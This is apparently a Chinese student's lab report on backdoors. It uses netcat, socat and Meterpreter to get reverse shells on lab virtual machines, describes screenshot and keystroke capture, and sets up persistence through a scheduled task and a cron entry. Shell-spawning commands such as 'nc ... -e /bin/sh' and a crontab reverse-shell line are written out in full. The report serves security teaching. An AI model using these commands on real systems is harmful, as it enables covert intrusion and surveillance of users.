实验内容
•利用netcat和socat获取靶机shell,并实现任务计划启动;
•使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令操作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装服务等
基础问题回答
1、如何启动后门?
Windows
在控制面板-管理工具-任务计划程序中添加任务,
linux中设置cron
2、如何防止被其他人安装后门程序?
防火墙和防病毒软件必须处于打开状态,定时清理垃圾软件和恶意广告,定期进行杀毒软件全盘扫描。
3、Meterpreter有哪些给你映像深刻的功能?
记录键盘输入抓取以及摄像头拍摄功能,很强的监视功能。
4、例举你能想到的一个后门进入到你系统中的可能方式?
浏览网页时,点击弹出的广告下载程序;下载软件时,自动捆绑下载了其他恶意程序。
实验过程
使用netcat获取主机操作Shell,cron启动
·首先保证虚拟机与主机之间能PING通。
·然后下载ncat与socat到windows与linux里(linux自带ncat)
(1)windows获取linux的shell
·windows开启监听端口:
·kali发起连接请求:
·Windows获得Linux的Shell
•在windows上打开cmd,并通过ncat开放端口5228
•在linux上反弹连接win:nc 192.168.184.128 5228 -e /bin/sh
(2)Linux获得Windows的Shell
•在linux下设置监听端口:nc -l -p 5228
•在windows下请求连接:ncat 192.168.184.128 5228 -e cmd.exe
•在linux下输入ipconfig查看主机IP:
ncat传输文件
•windows系统使用ncat.exe -lv 1452 > 5228.exe监听准备接受文件
•kali系统使用ncat -nv 172.30.3.151 1452 <20145228来发送指定文件
使用socat获取主机操作Shell
(1)kali上用socat tcp-listen:5228把cmd绑定到端口5228
•同時用socat tcp-l:5228 system:bash,pty,stderr反弹连接
(2)windows使用socat readline tcp:172.30.1.251 5228开启监听
•使用ifconfig检测
meterpreter 生成后门程序
•使用msfconsole命令开启msf进行设置
•监听开始,在windows中运行之前的后门程序可以成功控制远程shell。
meterpreter信息搜集
•查看系统版本信息
•对靶机进行截图
•记录键盘输入
•安装为系统服务
设置后门自动启动
(1)Windows
•在控制面板-管理工具-任务计划程序中添加任务,编辑触发器等
(2)linux
cron启动
•kali下终端使用crontab -e修改配置文件
在最后一行后加入* * * * * /bin/ncat 172.30.1.154 5228 -e /bin/sh
*号代表时间
实验感悟
做完这个实验后,了解到了后门程序的植入以及运行方式,使我们在以后的生活中有着防范后门的意识,具有极大的积极作用。